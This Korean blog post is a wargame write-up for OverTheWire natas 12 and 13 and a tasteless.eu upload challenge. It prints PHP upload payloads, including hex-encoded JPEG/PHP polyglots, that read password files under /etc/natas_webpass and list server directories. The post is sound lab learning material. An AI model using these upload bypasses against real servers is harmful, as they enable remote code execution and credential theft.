webhacking/etc

overthewire natas 12, 13, chall.tasteless.eu Get Me Down

qkqhxla1 2015. 6. 27. 19:39

overthewire natas 12.

파일 업로드 문제. 소스코드는 긴데 예시로 하나 올려보면 어떻게 동작하는지 알 수 있다. 내가 어떤 파일 이름을 올리던 랜덤.jpg로 파일을 업로드하는데 그 업로드요청을 클라이언트에서 한다. test.php를 만든 후 내부는 <?php include "/etc/natas_webpass/natas13"; ?>처럼 채워주고 보낼때 확장자를 php로 바꿔서 보내면 성공한다.



overthewire natas 13.

12번과 동일한데 exif_imagetype() 함수로 파일을 검사한다. 이게 뭔가 하니 이미지타입을 검사하는 함수라고 한다. 내가 올린 내부를 검사해서 이미지타입인지 검사한다는 소리이다. jpeg나 bmp 관련 문서를 참조해서 헤더를 만든 후 내부에 위의 include를 넣으면 된다. 근데 사실 문서봐도 모르는 인자가 많아서 아무거나 적당한 크기의 예시 jpeg파일을 가져와서 그걸 변경했다.


관련 자료 : https://en.wikipedia.org/wiki/JPEG_File_Interchange_Format

또다른 설명 잘된 곳 : http://cometkorea.tistory.com/56

파일이 제대로 첨부가 안되서 내가 만든걸 올리자면


FF D8 FF E0 00 10 4A 46 49 46 00 01 02 00 00 00 00 00 00 00 FF C0 00 41 3C 3F 70 68 70 20 69 6E 63 6C 75 64 65 20 22 2F 65 74 63 2F 6E 61 74 61 73 5F 77 65 62 70 61 73 73 2F 6E 61 74 61 73 31 34 22 3B 3F 3E FF D9

이렇게 만들었다.




chall.tasteless.eu Get Me Down.

overthewire natas의 13번과 같이 jpeg파일을 하나 만들면 된다.

이건 이렇게 만들었다.

FF D8 FF E0 00 10 4A 46 49 46 00 01 00 00 00 00 00 00 00 00 FF C0 00 41 3C 3F 70 68 70 20 70 72 69 6E 74 5F 72 28 73 63 61 6E 64 69 72 28 27 2F 76 61 72 2F 77 77 77 2F 63 68 61 6C 6C 2F 6C 65 76 65 6C 37 27 29 29 3B 3F 3E FF D9



'webhacking > etc' 카테고리의 다른 글

adm1nkyj님의 새 워게임  (0) 2015.07.05
securitytraps.pl Let's start  (0) 2015.07.02
wargame.kr mini TBR  (0) 2015.05.24
securitytraps.pl pre, Who am I?, StrCmp, Training, The Truth  (0) 2015.05.08
canyouhack.it script 1~3  (0) 2015.05.02